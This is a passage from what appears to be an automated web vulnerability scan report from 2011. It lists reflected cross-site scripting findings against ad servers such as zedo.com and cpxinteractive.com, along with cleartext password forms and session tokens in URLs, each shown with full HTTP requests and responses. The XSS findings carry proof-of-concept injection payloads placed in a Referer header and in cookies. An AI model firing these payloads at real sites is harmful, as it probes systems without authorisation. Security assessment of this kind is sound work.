var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico69951'-alert(1)-'8f65520acae';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.143. http://adserving.cpxinteractive.com/st [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4c31'-alert(1)-'1769fa3b869 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e4c31'-alert(1)-'1769fa3b869
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:32 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:32 GMT
Content-Length: 474

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.google.com/search%3Fhl=en%26q=e4c31'-alert(1)-'1769fa3b869&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3
...[SNIP]...

2.144. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfb25"-alert(1)-"75ee6a13843 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=9&q=&$=&s=2&z=0.6579760571476072 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311bfb25"-alert(1)-"75ee6a13843; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199; FFSkp=305,7040,15,1:; FFcat=305,7040,15:305,7038,15; FFad=0:0; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:3944d'$1545:1c4ea';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,622,9:1545,8,9:826,622,14:1545,8,14:1545,8,0:0,8,14:1545,0,14:0,8,9:1545,0,9:305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=38:36:27:25:3:1:1:1:1:1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2470020B826,110235,110236:1545,219513,220546,220547,219514,221452,228586,235518,221451|2,1#0,24:2,1#0,24:4,1#0,24:5,1#0,24:5,1#0,24:4,1#0,24:4,1#0,24:0,1#0,24:0,1#0,24:4,1#0,24;expires=Wed, 12 Oct 2011 12:49:06 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=152
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:49:06 GMT
Content-Length: 2740
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='1c4ea'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=1c4ea';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311bfb25"-alert(1)-"75ee6a13843';

var zzhasAd=undefined;


                                                                    var
...[SNIP]...

2.145. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c61c"-alert(1)-"72963d88d75 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~0903113c61c"-alert(1)-"72963d88d75; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 448
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:f095e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,91a0a560b5ee888bf58170a13;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=16:2:1:0:0:0:01a0a560b5991a4ca97d403e3;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:1a0a560b8232ac2cc4a13028;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=79
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='f095e'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=f095e';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~0903113c61c"-alert(1)-"72963d88d75';

var zzhasAd=undefined;


               

3. Cleartext submission of password  previous  next
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://www.digitaldollhouse.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<div id="login"><form action="/homeone?destination=homeone" accept-charset="UTF-8" method="post" id="newhome-login">
<div>
...[SNIP]...
<div class="form-item" id="newhome-login-pass-wrapper">
<input type="password" name="pass" id="newhome-login-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

3.2. http://www.digitaldollhouse.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
</div>
<form action="/" accept-charset="UTF-8" method="post" id="newhome-register" onsubmit="pageTracker._trackPageview(&#039;/virtual/register&#039;);">
<div>
...[SNIP]...
</label>
<input type="password" name="pass[pass1]" id="edit-pass-pass1" maxlength="128" size="25" class="form-text required password-field" />
</div>
...[SNIP]...
</label>
<input type="password" name="pass[pass2]" id="edit-pass-pass2" maxlength="128" size="25" class="form-text required password-confirm" />
</div>
...[SNIP]...

3.3. http://www.fastcompany.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
</div><form action="/" accept-charset="UTF-8" method="post" id="profileSignUpForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-regPass-wrapper">
<input type="password" name="regPass" id="edit-regPass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

3.4. http://www.fastcompany.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<div id="left_forms"><form action="/home?destination=home" accept-charset="UTF-8" method="post" id="profilLoginForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-pass-wrapper">
<input type="password" name="pass" id="edit-pass" maxlength="60" size="20" class="form-text required" />
</div>
...[SNIP]...

3.5. http://www.nowpublic.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nowpublic.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.nowpublic.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:18 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n54.panthercdn.com
ETag: "f79c8d21f3918aedd34f5c0ed9e4fcae"
Cache-Control: max-age=360
Expires: Mon, 12 Sep 2011 12:54:12 GMT
Age: 6
Content-Length: 74898
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Last-Modified: Mon, 12 Sep 2011 12:28:25 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<div class="wrapper-body">
<form method="post" action="http://my.nowpublic.com/user/login">
<div id="login-name-wrapper" class="form-item">
...[SNIP]...
</label>
<input type="password" name="pass" id="login-pass" maxlength="128" size="30" class="form-text" />
</div>
...[SNIP]...

4. Session token in URL  previous  next
There are 6 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=replace&advid=996&token=FACO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1; C2W4=0; FC1-WCR=132982_2_3CA1G^132981_1_3CA3o; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Thu, 06-Sep-2012 12:47:51 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; Domain=.contextweb.com; Expires=Tue, 16-Aug-2016 12:47:51 GMT; Path=/
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:47:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

4.2. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=wp.12086c39-fe96-4496-b817-e62244e98b59&hostname=www.dome9.com&location=%2F&url=http%3A%2F%2Fwww.dome9.com%2F&sessionID=1315849264587.66546&fpc=35aae75-1325eba5dcc-1493d30f-1&ts1315849265708.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.dome9.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 12 Sep 2011 12:40:55 GMT
Connection: keep-alive


4.3. http://video.fastcompany.com/manifests/companies/mansueto-digital/videos.rss/8516eaf70522ed9dcc26b0815a85ef0c-fc_playlist_homepage.txt  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://video.fastcompany.com
Path:   /manifests/companies/mansueto-digital/videos.rss/8516eaf70522ed9dcc26b0815a85ef0c-fc_playlist_homepage.txt

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /manifests/companies/mansueto-digital/videos.rss/8516eaf70522ed9dcc26b0815a85ef0c-fc_playlist_homepage.txt?voxtoken=system&autoplay=false&config=%7BconfigInject%3A'true'%7D&embed_location=http%3A%2F%2Fwww.fastcompany.com%2F&feed=http%3A%2F%2Fvideo.fastcompany.com%2Fcompanies%2Fmansueto-digital%2Fvideos.rss%3Fids%3D35a3467f31b51%2C5a74966232a47%2C1bc51eb069eb1%2C29b58b01bf488%2C79b00a7ba65dd%2C273bd40607339%26append_image_to_description%3Dfalse%26verbosity%3Dlow&height=180&p=fc_playlist_homepage&width=320 HTTP/1.1
Host: video.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://video.fastcompany.com/plugins/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:07 GMT
Server: VoxCAST
Last-Modified: Sat, 10 Sep 2011 12:55:27 GMT
Vary: Accept-Encoding
Cache-Control: max-age=3600
Expires: Mon, 12 Sep 2011 12:49:20 GMT
X-Cache: HIT from VoxCAST
Content-Length: 4383
Age: 3528
Content-Type: text/plain

/plugins/flowplayer.swf?config=%7B%22plugins%22%3A%7B%22bwcheck%22%3A%7B%22url%22%3A%22flowplayer.bwcheck.swf%22%2C%22serverType%22%3A%22fms%22%2C%22netConnectionUrl%22%3A%22rtmp%3A%2F%2Ffms.0367.edge
...[SNIP]...

4.4. http://video.fastcompany.com/plugins/flowplayer.swf  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://video.fastcompany.com
Path:   /plugins/flowplayer.swf

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/flowplayer.swf?voxtoken=system&embed_domain=www.fastcompany.com HTTP/1.1
Host: video.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://video.fastcompany.com/plugins/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1603584230-1315849705375

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:09 GMT
Server: VoxCAST
Last-Modified: Thu, 25 Aug 2011 01:47:01 GMT
Cache-Control: max-age=3600
Expires: Mon, 12 Sep 2011 13:47:36 GMT
Accept-Ranges: bytes
Content-Length: 123292
Age: 33
X-Cache: HIT from VoxCAST
Content-Type: application/x-shockwave-flash

CWS
~...x..}.`[....O..iK.....,..I....cK......@.gYz.DdI.I...H...R6..Zf[.t1
tA.%.._.._.-...=.....{..,.~'O..s....{...M
......A./
.... \..]".'......xdr"_.:.w..l.R.........l.P,.o.t.I'ml..q.....^.*T.......
...[SNIP]...

4.5. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=127445909615&app_id=127445909615&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd667bad4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36fd7b1e%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f5002a3%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33dd7c2b4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df146f8bdf4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
